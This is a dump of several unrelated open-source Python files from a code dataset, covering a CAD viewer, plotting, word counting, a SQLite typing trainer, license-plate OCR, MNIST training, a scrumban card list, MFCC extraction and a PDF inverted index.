Contact support@parapy.nl\")\n self.logger.warning(msg)\n else:\n evt = create_right_click_background_event(\n evt_pos)\n wx.PostEvent(self, evt)\n\n elif self._selected_area: # small motions can be filtered out\n # self.dc.Clear()\n x1, y1, x2, y2 = self._selected_area\n self.fit_window(x1, y1, x2, y2)\n self._selected_area = None\n\n def OnMotion(self, evt):\n if evt.Dragging():\n self._dragged = True\n if evt.LeftIsDown():\n # mode: area zoom\n if evt.ShiftDown():\n self._mark_area(evt)\n self._draw_rubberband()\n # mode: rotate\n else:\n x, y = evt.GetX(), evt.GetY()\n self._v3d_view.Rotation(x, y)\n elif evt.RightIsDown():\n # mode: area select\n if evt.ShiftDown():\n self._mark_area(evt)\n self._draw_rubberband()\n # mode: dynamic zoom\n else:\n x, y = evt.GetX(), evt.GetY()\n x_old, y_old = self._drag_x1_y1\n dy = y_old - y # positive is 'up'\n # ATTENTION: OCC's Zoom only interprets the x coordinate,\n # so the vertical mouse delta is passed as x\n self._v3d_view.Zoom(0, 0, dy, 0)\n self._drag_x1_y1 = x, y\n # mode: pan\n elif evt.MiddleIsDown():\n x, y = evt.GetX(), evt.GetY()\n x_old, y_old = self._drag_x1_y1\n dx = x - x_old\n dy = y_old - y # negative y\n self._v3d_view.Pan(dx, dy)\n self._drag_x1_y1 = x, y\n else:\n x, y = evt.GetX(), evt.GetY()\n self.move_to(x, y)\n\n def OnWheelScroll(self, evt):\n delta = evt.GetWheelDelta()\n rotation = evt.GetWheelRotation()\n rate = evt.GetLinesPerAction()\n shift_down = evt.ShiftDown()\n\n zoom_rate = rate * float(abs(rotation)) / delta\n\n if zoom_rate <= 0:\n zoom_rate = 0.2\n\n if shift_down: # precision zooming\n zoom_rate /= 10.\n\n zoom_factor = 1. + zoom_rate\n if rotation < 0: # take reciprocal for zooming out\n zoom_factor = 1. / zoom_factor\n\n self.zoom(zoom_factor)\n\n def OnEraseBackground(self, evt):\n pass\n\n def on_enter_window(self, evt):\n # This is done to make sure that when a pop-up is clicked away\n # with a right-click, no zooming will happen.\n self._drag_x1_y1 = evt.GetX(), evt.GetY()\n evt.Skip()\n\n\nclass ViewerWindow(wx.Frame):\n def __init__(self, show=True, title=\"ParaPy Graphical User Interface\"):\n wx.Frame.__init__(self, None, -1, title)\n self.viewer = Viewer(self)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.viewer, 1, wx.EXPAND)\n self.SetSizer(sizer)\n self.SetAutoLayout(True)\n sizer.Layout()\n\n # do this after V3D_View has been created...\n self.Show(show)\n\n\nclass ZLayers(object):\n \"\"\"Object to manage Z-layers in :class:`Viewer`.\n\n >>> layers = viewer.zlayers\n >>> layers.layer_ids()\n [-5, 0, -2, -3, -4]\n >>> layers.top_most_layer_id()\n -4\n >>> layers.add_layer()\n 1\n >>> layers.layer_ids()\n [-5, 0, 1, -2, -3, -4]\n >>> layers.top_most_layer_id()\n -4\n >>> layers.top_most_layer_id(exclude_default_layers=True)\n 1\n >>> layers.remove_layer(1)\n\n .. note:: for developers, default V3d_Viewer layers are (from btm to top):\n\n * -5: Graphic3d_ZLayerId_BotOSD\n * 0: Graphic3d_ZLayerId_Default\n * -2: Graphic3d_ZLayerId_Top\n * -3: Graphic3d_ZLayerId_Topmost\n * -4: Graphic3d_ZLayerId_TopOSD\n \"\"\"\n\n def __init__(self, v3d_viewer):\n self._v3d_viewer = v3d_viewer\n\n def layer_ids(self, exclude_default_layers=False):\n \"\"\"Return all Z layer ids in sequence ordered by overlay level from\n lowest layer to highest (foreground). The first layer ID in sequence\n is the default layer that can't be removed. Optionally, you can\n ``exclude_default_layers``, which will only return ids of layers added\n after the Viewer was created. 
This can be an empty list.\n\n :rtype: list[int]\n \"\"\"\n ids = TColStd_SequenceOfInteger()\n self._v3d_viewer.GetAllZLayers(ids)\n if exclude_default_layers:\n # OCC default layers are all <= 0\n return [i for i in ids if i > 0]\n else:\n return list(ids)\n\n def top_most_layer_id(self, exclude_default_layers=False):\n \"\"\"Get top-most layer id. Optionally, you can\n ``exclude_default_layers``, which will limit the search to only those\n layers added after the Viewer was created. If no layers were added,\n :py:`None` is returned.\n\n :rtype: int | None\n \"\"\"\n lst = self.layer_ids(exclude_default_layers=exclude_default_layers)\n if lst:\n return lst[-1]\n else:\n return None\n\n def add_layer(self):\n \"\"\"Add a new top-level Z layer and get its ID.\n\n :rtype: int\n :raises RuntimeError: if the layer couldn't be created.\n \"\"\"\n flag, layer_id = self._v3d_viewer.AddZLayer()\n if not flag:\n raise RuntimeError(\"Layer couldn't be created\")\n return layer_id\n\n def remove_layer(self, layer_id):\n \"\"\"Remove a Z layer by its ``layer_id``.\n\n :param int layer_id:\n :raises RuntimeError: if the layer couldn't be removed; by default\n there are always default bottom-level layer(s) that can't be\n removed.\n \"\"\"\n flag = self._v3d_viewer.RemoveZLayer(layer_id)\n if not flag:\n raise RuntimeError(\"Layer couldn't be removed\")\n return layer_id\n\n\nif __name__ == '__main__':\n from OCC.wrapper.BRepPrimAPI import (\n BRepPrimAPI_MakeBox, BRepPrimAPI_MakeSphere)\n\n app = wx.GetApp() or wx.App(False)\n wx.SafeYield()\n frame = ViewerWindow()\n viewer = frame.viewer\n\n box = BRepPrimAPI_MakeBox(1, 2, 3)\n sphere = BRepPrimAPI_MakeSphere(1)\n\n ais_shape1 = viewer.display_topods_shape(box.Shape())\n ais_shape2 = viewer.display_topods_shape(sphere.Shape())\n ais_trihedron1 = viewer.display_trihedron((2, 2, 0), zoom_persistent=True)\n ais_trihedron2 = viewer.display_trihedron((3, 3, 0), zoom_persistent=False)\n ais_text = viewer.display_text(\"Value: 1.0\", (1.5, 1, 0), top_most=True)\n ais_text = viewer.display_text(\"Value: 2.0\", (2.0, 1, 0), top_most=True)\n # viewer.highlight(ais_shape1, \"red\")\n\n # viewer.add_clipplane((0, 0, 0.3), (0, 0, 1))\n # viewer.add_clipplane((0, 0, 0.4), (0, 0, -1))\n\n frame.Maximize()\n frame.Raise()\n app.SetTopWindow(frame)\n\n app.MainLoop()\n","repo_name":"msaezo/KBE","sub_path":"PythonFolder/venv/Lib/site-packages/OCC/gui/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":80372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10999785433","text":"import seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# generate 300 data points\n# (np.random.random_integers is deprecated; randint's upper bound is exclusive)\nx = np.random.randint(0, 8, 300)\n# random 0 or 1\nsex = np.random.randint(0, 2, 300)\n# y = np.random.random(300)*10\ny = np.abs(np.random.normal(0, 2, 300))\nprint(y)\n# pd.value_counts is deprecated; use the Series method instead\nr = pd.Series(y).value_counts()\n# print(r)\ndata = pd.DataFrame(x, columns=[\"x\"])\ndata[\"y\"] = y\ndata[\"sex\"] = sex\nprint(data)\n# two ways to draw the categorical plot shown below\n# sns.stripplot(x=\"x\", y=\"y\", data=data, jitter=True)\nsns.swarmplot(x=\"x\", y=\"y\", hue=\"sex\", data=data)\nplt.show()\n","repo_name":"dyanfee/pyLearn","sub_path":"Seaborn/text4.py","file_name":"text4.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41387136468","text":"import re\r\nimport string\r\n\r\nfilename = \"CS210_Project_Three_Input_File.txt\" #assign the input file name\r\nwriteFile = 
\"frequency.dat\" #assign the output file name\r\nf = open(filename, \"r\") #open and reads input data file\r\nw = open(writeFile, \"w\") #open and writes to output file\r\ndata = f.read() #read input file\r\nlist_of_items = data.split() #split the data into individual items & store them in a list\r\nfrequency = {} #dictionary to store item:frequeny\r\n \r\n#Method to return a list which contains each items and their quanities in the list\r\ndef get_frequency_of_each_item():\r\n\r\n #Calculating the quantity\r\n for item in list_of_items:\r\n frequency[item] = frequency.get(item,0)+1 \r\n \r\n return_string = \"\" \r\n\r\n #Appending data to return string\r\n for item,freq in frequency.items():\r\n return_string += item + \": \" + str(freq) + '\\n' \r\n\r\n #Write to frequency file\r\n w.write(return_string)\r\n #Print\r\n print(return_string)\r\n \r\n#Method to returns a string which contains a specific item and its quantity \r\ndef get_frequency_of_single_item(item_name):\r\n\r\n #Sets the input to capitalized first letter and lower case rest no matter the input\r\n item_name = item_name.capitalize()\r\n\r\n for item in list_of_items:\r\n frequency[item] = frequency.get(item,0)+1 \r\n \r\n #if statement if given item is present in the string\r\n if item_name in frequency: \r\n print(\"Qty of \" + item_name + \" sold: \", end=\"\")\r\n return frequency[item_name]\r\n\r\n #else statement if there is no match item\r\n else:\r\n print(\"Qty of \" + item_name + \" sold: \", end=\"\")\r\n return 0\r\n \r\n#Method to return a histogram which contains each items and their quanities in the list. \r\ndef display_histogram():\r\n\r\n for item in list_of_items:\r\n frequency[item]= frequency.get(item,0)+1\r\n \r\n ans=\"\"\r\n\r\n #appending item, '*' no.of times the item occures and aligning ':' for a unform look\r\n for item,freq in frequency.items():\r\n ans += '%15s' % item + \": \" + '*'* freq + '\\n'\r\n \r\n w.write(ans)\r\n print(ans)\r\n\r\n \r\n","repo_name":"mfox88/CPlusPlusProgram","sub_path":"PythonCode.py","file_name":"PythonCode.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32914529485","text":"import sqlite3\nfrom sqlite3 import Error\nfrom random import seed, randint\nfrom time import time\nfrom os import path\n\nclass Database:\n seed(time())\n __DB_LOCATION = path.join(path.realpath('.'),\"data\",\"typing.db\")\n __CSV_LOCATION = path.join(path.realpath('.'),\"data\",\"words.csv\")\n __create_word_table_query = \"\"\"CREATE TABLE IF NOT EXISTS words (\n id integer PRIMARY KEY,\n name text NOT NULL\n );\"\"\"\n\n __LOG_DB_LOCATION = path.join(path.realpath('.'),\"data\",\"log.db\")\n __create_log_table_query = \"\"\"CREATE TABLE IF NOT EXISTS log (\n id INTEGER PRIMARY KEY, \n freq INTEGER, \n error_count INTEGER\n );\"\"\"\n\n __STATS_DB_LOCATION = path.join(path.realpath('.'),\"data\",\"stats.db\")\n __create_stats_table_query = \"\"\"CREATE TABLE IF NOT EXISTS stats (\n id INTEGER PRIMARY KEY, \n date_created DATETIME\n );\"\"\"\n\n WORDS_TABLE = \"words\"\n WORDS_TABLE_COLS = \"id, name\"\n\n def __init__(self):\n self.__conn = self.__create_connection(self.__LOG_DB_LOCATION)\n self.__cursor = self.__conn.cursor()\n self.__create_log_table()\n\n self.__conn = self.__create_connection(self.__STATS_DB_LOCATION)\n self.__cursor = self.__conn.cursor()\n self.__create_stats_table()\n\n self.__conn = self.__create_connection(self.__DB_LOCATION)\n self.__cursor = 
self.__conn.cursor()\n self.__create_word_table()\n\n self.__init_words()\n \n def __create_connection(self, db_file):\n \"\"\"connect to db path\"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n return conn\n def select_all_from_table(self, table):\n sql_command = \"\"\"SELECT * FROM {}\"\"\".format(table)\n self.__cursor.execute(sql_command)\n return self.__cursor.fetchall()\n \n def select_random_word(self):\n return self.select_by_id(self.WORDS_TABLE, randint(1,1000))\n \n def select_random_phrase(self, length):\n phrase = \"\"\n while length > 0:\n phrase += self.select_random_word()[1]\n if length > 1:\n phrase += \" \"\n length-=1\n return phrase\n\n def select_by_id(self, table, id):\n \"\"\"\n fetches first matching id\n \"\"\"\n sql_command = \"\"\"SELECT * FROM {} WHERE id=?\"\"\".format(table)\n rows = self.__cursor.execute(sql_command,(id,)).fetchone()\n return rows\n\n def select_by_custom(self, table, condition):\n pass\n\n def close(self):\n self.__conn.close()\n \n def __create_word_table(self):\n try:\n self.__cursor.execute(\n self.__create_word_table_query\n )\n except Error as e:\n print(e)\n\n def __create_log_table(self):\n try:\n self.__cursor.execute(\n self.__create_log_table_query\n )\n except Error as e:\n print(e)\n\n def __create_stats_table(self):\n try:\n self.__cursor.execute(\n self.__create_stats_table_query\n )\n except Error as e:\n print(e)\n\n def __init_words(self):\n words = self.select_by_id(self.WORDS_TABLE, 1)\n if words is None:\n # parse csv\n with open(self.__CSV_LOCATION,'r') as reader:\n for id, line in enumerate(reader.readlines(), start=0):\n line = line.strip('\\n\\r')\n self.insert_data(self.WORDS_TABLE, self.WORDS_TABLE_COLS, (id,line))\n \n\n def insert_data(self, table, columns,data):\n \"\"\"inserts data into a table. will error if table does not exist\n :param table string TABLE NAME:\n :param columns COLUMNS corresponding to table. 
should be a string that is comma separated: \n        :param data two-dimensional list of data rows that corresponds with the selected table: \n        :returns newly inserted row's ID: \"\"\"\n\n        col_num = \"?\"+(\",?\"*columns.count(\",\"))\n        sql_command = \"\"\"INSERT INTO {}({}) VALUES({})\"\"\".format(table, columns,col_num)\n        self.__cursor.execute(sql_command, data)\n        self.__conn.commit()\n        # return the newly inserted row's id, as the docstring promises\n        return self.__cursor.lastrowid\n    \n\n\nif __name__==\"__main__\":\n    db = Database()\n    random_word = db.select_random_phrase(3)\n    print(random_word)\n    db.close()\n","repo_name":"calmcoconut/typing-trainer","sub_path":"sql_model.py","file_name":"sql_model.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"7224948787","text":"from utils.anpr import ANPR\nfrom imutils import paths\nimport argparse\nimport imutils\nimport cv2\n\ndef cleanup_text(text):\n\treturn \"\".join([c if ord(c) < 128 else \"\" for c in text]).strip()\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True,\n\thelp=\"path to input directory of images\")\nap.add_argument(\"-d\", \"--debug\", type=int, default=-1,\n\thelp=\"whether or not to show additional visualizations\")\nargs = vars(ap.parse_args())\n\n\nanpr = ANPR(debug=args[\"debug\"] > 0)\nimagePaths = sorted(list(paths.list_images(args[\"input\"])))\n\nfor imagePath in imagePaths:\n\n\timage = cv2.imread(imagePath)\n\timage = imutils.resize(image, width=600)\n\t\n\t(lpText, bbox) = anpr.find_and_ocr(image)\n\t\n\tif lpText is not None and bbox is not None:\n\t\t\n\t\t(x, y, w, h) = bbox\n\t\tcv2.rectangle(image, (x ,y), (x+w ,y+h ), (255, 0, 0), 3)\n\t\tcv2.putText(image, cleanup_text(lpText), (x, y - 15),\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)\n\t\t\n\t\tprint(\"[INFO] {}\".format(lpText))\n\t\tcv2.imshow(\"Output ANPR\", image)\n\t\tcv2.imwrite('Output/'+imagePath.split(\"/\")[-1],image)\n\t\tcv2.waitKey(0)\t","repo_name":"pranshu97/ANPR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"41312879022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 4 10:21:40 2020\nhttp://neuralnetworksanddeeplearning.com/chap1.html\n@author: martijn\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n# load classes\nfrom MNISTDataLoader import MNISTDataLoader\nfrom NeuralNetworkFast import NeuralNetwork\n\npath = 'D:/Master/'\nnumImagesTrain = 60000 # max 60000\nnumImagesTest = 10000 # max 10000\nbatchSize = 30 # number of images used before updating the weights of the network\neta = 1 # learning rate\nepochs = 30 # number of times to loop through the training images\nNetworkNeurons = [784,30,20,10] # begin must be 784, end must be 10, everything in between can be chosen freely\nSaveResults2textfile = False # save network parameters and results in .txt file\n\n# Create an image with some of the wrongly identified numbers by the neural network\n# The image contains the first numrow*numcol wrongly identified images from the \n# test data set\nCreateWrongIdentifiedPictures = True # True to create the image\nnumrow = 6 # number of rows within the subplot of wrongly identified images\nnumcol = 4 # number of columns within the subplot of wrongly identified images\n\n# Loading and decoding data\ndataloader = MNISTDataLoader()\ntestImage = dataloader.readBinaryFile2DataMatrix('Test',path,16,numImagesTest) \ntestLabel = 
dataloader.readBinaryFile2LabelMatrix('Test',path,8,numImage = numImagesTest) \ntrainImages = dataloader.readBinaryFile2DataMatrix('Train',path,16,numImage = numImagesTrain)\ntrainLabels = dataloader.readBinaryFile2LabelMatrix('Train',path,8,numImage = numImagesTrain)\n\n# Create neural network and train the network using the stochastic gradient descent method\nNetworkTest = NeuralNetwork(NetworkNeurons)\nNetworkTest.sgd(trainImages/255,trainLabels,batchSize,epochs,eta,testImage/255,testLabel,SaveResults2textfile)\n\n# Create image of wrongly identified numbers\nif CreateWrongIdentifiedPictures:\n    fig, axs = plt.subplots(numcol, numrow)\n    col = 0\n    row = 0\n    a = np.zeros((784,1))\n    b = np.zeros((10,1))\n    \n    for ii in range(0,numImagesTest):\n        # This could be vectorized, but the code does not yet suffer from a slowdown\n        a[:,:] = np.reshape(testImage[:,ii],(784,1))\n        b[:,:] = np.reshape(testLabel[:,ii],(10,1))\n        r = NetworkTest.evaluate(a,b) \n        # returns a float, however as we only test one image we are certain the \n        # result is either a zero or a one (no floating point errors)\n        if r == 0:\n            # label and recognised number are different, create image of this instance\n            numberNeuralNetwork = NetworkTest.NetworkOutput2Number(NetworkTest.feedforward(a))[0]\n            axs[col, row].imshow(np.reshape(a,(28,28)),cmap='gray', vmin=0, vmax=255)\n            axs[col, row].set_title('Label: '+str(dataloader.labelVector2number(b))+\n                                    ' Network: '+str(numberNeuralNetwork))\n            axs[col, row].axis('off')\n            # update the column and row indices of the subplot\n            row += 1\n            if (row % numrow) == 0:\n                col += 1\n                row = 0\n            if (col % numcol) == 0:\n                # subplot cannot hold anymore images so break the loop\n                break\n\n    \ndef showRandomlySelectedImage(testImage,testLabel):\n    #shows a random image from the data set\n    imageNum = testLabel.shape\n    # randrange keeps the index in bounds (round(uniform(...)) could return an\n    # out-of-range index equal to the number of images)\n    imageNum = random.randrange(imageNum[1])\n    dataloader.showImage(testImage[:,imageNum], testLabel[:,imageNum], imageNum)\n    return\n","repo_name":"martijneppenga/Machine_learning_introduction","sub_path":"Nielson/NeuralNetworkHandWrittenImage.py","file_name":"NeuralNetworkHandWrittenImage.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"30417908275","text":"import os\nimport logging.config\nimport string\nimport random\n\nfrom hashlib import sha1\nfrom collections import deque\nimport datetime\n\nfrom scrumban_board_python.scrumban_board.card import Card\nfrom scrumban_board_python.scrumban_board.terminal_colors import Colors\n\nlogging.config.fileConfig('logging.cfg')\nlogger = logging.getLogger(\"ScrumbanBoard\")\n\n\nclass CardList:\n    \"\"\"\n    Board contains Cardlists with cards\n\n    Example:\n    to_do = CardList(\"To-Do\")\n    doing = CardList(\"Doing\")\n    done = CardList(\"Done\")\n    overdue = CardList(\"Overdue\")\n    \"\"\"\n\n    @staticmethod\n    def get_cards(cards):\n        new_cards = deque()\n\n        if cards is not None:\n            if isinstance(cards, Card):\n                new_cards.append(cards)\n\n            elif isinstance(cards, deque):\n                for card in cards:\n                    if isinstance(card, Card):\n                        new_cards.append(card)\n\n        return new_cards\n\n    def __init__(self, title: str,\n                 cards=None, description: str = None):\n        \"\"\"\n        Initialising of Cardlist\n\n        :param title: cardlist title\n        :param cards: deque of cards (or Card)\n        :param description: cardlist description\n        \"\"\"\n        self.title = title\n        self.description = description\n\n        self.cards = CardList.get_cards(cards)\n\n        self.id = self._get_id()\n\n        logger.info(\"Cardlist ({}) was 
created\".format(self.id))\n\n    def _get_id(self):\n        key = ''.join(\n            random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(len(self.title)))\n\n        return sha1((\"CardList: \" +\n                     key + \" \" +\n                     self.title + \" \" +\n                     str(datetime.datetime.now())).encode('utf-8')).hexdigest()\n\n    def __str__(self):\n        cards = [card for card in self.cards]\n\n        output = Colors.cardlist_green + \"\"\"\n    --- Cardlist ---\n    Title: {}\n    Description: {}\n    ID: {}\n    \n    Cards: \n    {}\n    \n    ---End Cardlist--\n\"\"\".format(self.title,\n           self.description,\n           self.id,\n           cards) + Colors.end_color\n\n        return output\n\n    def __repr__(self):\n        cards = [card for card in self.cards]\n\n        output = Colors.cardlist_green + \"\"\"\n    --- Cardlist ---\n    Title: {}\n    Description: {}\n    ID: {}\n    \n    Cards: \n    {}\n    \n    ---End Cardlist--\n\"\"\".format(self.title,\n           self.description,\n           self.id,\n           cards) + Colors.end_color\n\n        return output\n\n    def update_cardlist(self, title: str = None, cards: deque = None, description: str = None):\n        \"\"\"\n        Update the cardlist\n\n        :param title: new title\n        :param cards: new cards (or Card)\n        :param description: new description\n        :return:\n        \"\"\"\n        if title is not None:\n            self.title = title\n\n        if cards is not None:\n            self.cards = CardList.get_cards(cards)\n\n        if description is not None:\n            self.description = description\n\n        logger.info(\"Cardlist ({}) was updated\".format(self.id))\n\n    def find_card(self, card_id=None, card_title=None):\n        \"\"\"\n        Search for a card in the cardlist\n\n        :param card_id: card id\n        :param card_title: card title\n        :return:\n        \"\"\"\n        if card_id is not None:\n            try:\n                card = next(card for card in self.cards if card.id == card_id)\n                logger.info(\"Card ({}) was found by card_id in Cardlist ({})\".format(card_id,\n                                                                                     self.id))\n\n                return card\n            except StopIteration:\n                logger.info(\"Card ({}) wasn't found by card_id in Cardlist ({})\".format(card_id,\n                                                                                        self.id))\n\n        elif card_title is not None:\n            try:\n                card = next(card for card in self.cards if card.title == card_title)\n                logger.info(\"Card ({}) was found by card_title in Cardlist ({})\".format(card_title,\n                                                                                        self.id))\n                return card\n            except StopIteration:\n                logger.info(\"Card ({}) wasn't found by card_title in Cardlist ({})\".format(card_title,\n                                                                                           self.id))\n        return None\n\n    def add_card(self, new_card: Card):\n        \"\"\"\n        Adding a new card\n\n        :param new_card: new card\n        :return:\n        \"\"\"\n        duplicate_card = self.find_card(card_id=new_card.id)\n\n        if duplicate_card is None:\n            self.cards.append(new_card)\n\n            logger.info(\"Card ({}) was added in Cardlist ({})\".format(new_card.id,\n                                                                      self.id))\n\n    def remove_card(self, card: Card = None, card_id=None):\n        \"\"\"\n        Removing a card\n\n        :param card: Card for removing\n        :param card_id: card id for removing\n        :return:\n        \"\"\"\n        if card is not None:\n            duplicate_card = self.find_card(card_id=card.id)\n\n            if duplicate_card is not None:\n                self.cards.remove(card)\n\n                logger.info(\"Card ({}) was removed from Cardlist ({})\".format(duplicate_card.id,\n                                                                              self.id))\n\n        elif card_id is not None:\n            duplicate_card = self.find_card(card_id=card_id)\n\n            if duplicate_card is not None:\n                self.cards.remove(duplicate_card)\n\n                logger.info(\"Card ({}) was removed from Cardlist ({})\".format(duplicate_card.id,\n                                                                              self.id))\n\n    def change_card_position(self, position: int, card: Card = None, card_id: str = None):\n        \"\"\"\n        Change a card's position in the cardlist\n\n        :param position: 1, 2 .. 
n\n        :param card: Card\n        :param card_id: card id\n        :return:\n        \"\"\"\n        if card is not None:\n            duplicate_card = self.find_card(card_id=card.id)\n\n            if duplicate_card is not None:\n                self.cards.remove(duplicate_card)\n\n                real_position = position - 1\n                self.cards.insert(real_position, duplicate_card)\n\n                logger.info(\"Card ({}) was moved in Cardlist ({}) to position {}\".format(duplicate_card.id,\n                                                                                         self.id,\n                                                                                         real_position))\n\n        elif card_id is not None:\n            duplicate_card = self.find_card(card_id=card_id)\n\n            if duplicate_card is not None:\n                self.cards.remove(duplicate_card)\n\n                real_position = position - 1\n                self.cards.insert(real_position, duplicate_card)\n\n                logger.info(\"Card ({}) was moved in Cardlist ({}) to position {}\".format(duplicate_card.id,\n                                                                                         self.id,\n                                                                                         real_position))\n","repo_name":"romamartyanov/Fantastical-Things","sub_path":"scrumban_board_python/scrumban_board/cardlist.py","file_name":"cardlist.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
{"seq_id":"16849782296","text":"import librosa\nimport os\nimport json\n\nDATASET_PATH = \"dataset\"\nJSON_PATH = \"data.json\"\nSAMPLES_TO_CONSIDER = 22050\n\n\ndef prepare_dataset(dataset_path, json_path, n_mfcc=13, hop_length=512, n_fft=2048):\n    # data dictionary\n    data = {\n        \"mappings\": [],\n        \"labels\": [],\n        \"MFCCs\": [],\n        \"files\": []\n    }\n\n    # loop through all the sub dirs:\n    for i, (dir_path, dir_names, file_names) in enumerate(os.walk(dataset_path)):\n        if dir_path != dataset_path:  # \"is not\" compared identity, not equality\n            category_name = dir_path.split(os.path.sep)[-1]\n            print(f\"Processing {category_name}\")\n            data[\"mappings\"].append(category_name)\n\n            for f in file_names:\n                file_path = os.path.sep.join([dir_path, f])\n\n                signal, sample_rate = librosa.load(file_path)\n\n                if len(signal) >= SAMPLES_TO_CONSIDER:\n                    # ensure one second long signal\n                    signal = signal[:SAMPLES_TO_CONSIDER]\n\n                    # extract the MFCCs (the y= keyword keeps this working on newer librosa)\n                    MFCCs = librosa.feature.mfcc(y=signal, n_mfcc=n_mfcc, hop_length=hop_length, n_fft=n_fft)\n\n                    # store data\n                    data[\"labels\"].append(i-1)\n                    data[\"MFCCs\"].append(MFCCs.T.tolist())\n                    data[\"files\"].append(file_path)\n\n                    print(f\"{file_path}: {i-1}\")\n\n    # store in json file\n    with open(json_path, \"w\") as fp:\n        json.dump(data, fp, indent=4)\n\n\nif __name__ == \"__main__\":\n    prepare_dataset(DATASET_PATH, JSON_PATH)\n","repo_name":"machingclee/deep-learning-study","sub_path":"2021-04-09-speech-recognition-deployment/local/prepare_model/prepare_dataset.py","file_name":"prepare_dataset.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"38992046613","text":"import string\nimport PyPDF2\nimport time\n#Main class\nclass Index(object):\n\t#Constructor\n\tdef __init__(self):\n\t\tself.inverted_index = {}\n\t#Formatting the data \n\tdef construct(self,file):\n\t\t# creating a pdf file object\n\t\tpdfFileObj = open(file, 'rb')\n \n\t\t# creating a pdf reader object\n\t\tpdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n \n\t\t# loop over all pages\n\t\tfor i in range(pdfReader.numPages):\n\n\t\t\tpageObj = pdfReader.getPage(i)\n \n\t\t# extracting text from page\n\t\t\tx = pageObj.extractText()\n\t\t\tx = x.split()\n\t\t\t\n\t\t\tself.insert_tokens(i + 1,x)\n\t\t# closing the pdf file object\n\t\tpdfFileObj.close()\n\n\t\tprint(\"Successfully Inserted!!!!\")\n\t#inserting each word\n\tdef insert_tokens(self,pageno,tokens):\n\t\tfor token in tokens:\n\t\t\ttoken = 
token.lower()\n\t\t\tif not token in bad: \n\t\t\t\tif not token in self.inverted_index:\n\t\t\t\t\tself.inverted_index[token] = {}\n\t\t\t\t\tself.inverted_index[token][pageno] = 0\n\t\t\t\tif not pageno in self.inverted_index[token]:\n\t\t\t\t\tself.inverted_index[token][pageno] = 0\n\t\t\t\tself.inverted_index[token][pageno] += 1\n\t\t\telse:\n\t\t\t\tcontinue\n\t#O(1) search\n\tdef search(self,token):\n\t\tif token in self.inverted_index:\n\t\t\tprint(\"PageNumber | Frequency:\")\n\t\t\treturn self.inverted_index[token]\n\t\telse:\t\n\t\t\treturn None\ndef display(x):\n\ttry:\n\t\tfor i in x:\n\t\t\tprint(i,\" | \",x[i])\n\texcept Exception as e:\n\t\tprint(\"Word not Found\")\nbad = frozenset([\n'a', 'about', 'across', 'after', 'afterwards', 'again', \n'against', 'all', 'almost', 'alone', 'along', 'already', 'also','although',\n'always','am','among', 'amongst', 'amoungst', 'amount', 'an', 'and', 'another',\n'any','anyhow','anyone','anything','anyway', 'anywhere', 'are', 'around', 'as',\n'at', 'back','be','became', 'because','become','becomes', 'becoming', 'been', \n'before', 'beforehand', 'behind', 'being', 'below', 'beside', 'besides', \n'between', 'beyond', 'bill', 'both', 'bottom','but', 'by', 'call', 'can', \n'cannot', 'cant', 'co', 'con', 'could', 'couldnt', 'cry', 'de', 'describe', \n'detail', 'do', 'done', 'down', 'due', 'during', 'each', 'eg', 'eight', \n'either', 'eleven','else', 'elsewhere', 'empty', 'enough', 'etc', 'even', \n'ever', 'every', 'everyone', 'everything', 'everywhere', 'except', 'few', \n'fifteen', 'fify', 'fill', 'find', 'fire', 'first', 'five', 'for', 'former', \n'formerly', 'forty', 'found', 'four', 'from', 'front', 'full', 'further', 'get',\n'give', 'go', 'had', 'has', 'hasnt', 'have', 'he', 'hence', 'her', 'here', \n'hereafter', 'hereby', 'herein', 'hereupon', 'hers', 'herself', 'him', \n'himself', 'his', 'how', 'however', 'hundred', 'ie', 'if', 'in', 'inc', \n'indeed', 'interest', 'into', 'is', 'it', 'its', 'itself', 'keep', 'last', \n'latter', 'latterly', 'least', 'less', 'ltd', 'made', 'many', 'may', 'me', \n'meanwhile', 'might', 'mill', 'mine', 'more', 'moreover', 'most', 'mostly', \n'move', 'much', 'must', 'my', 'myself', 'name', 'namely', 'neither', 'never', \n'nevertheless', 'next', 'nine', 'no', 'nobody', 'none', 'noone', 'nor', 'not', \n'nothing', 'now', 'nowhere', 'of', 'off', 'often', 'on', 'once', 'one', 'only',\n'onto', 'or', 'other', 'others', 'otherwise', 'our', 'ours', 'ourselves', 'out',\n'over', 'own','part', 'per', 'perhaps', 'please', 'put', 'rather', 're', 'same',\n'see', 'seem', 'seemed', 'seeming', 'seems', 'serious', 'several', 'she', \n'should', 'show', 'side', 'since', 'sincere', 'six', 'sixty', 'so', 'some', \n'somehow', 'someone', 'something', 'sometime', 'sometimes', 'somewhere', \n'still', 'such', 'system', 'take', 'ten', 'than', 'that', 'the', 'their', \n'them', 'themselves', 'then', 'thence', 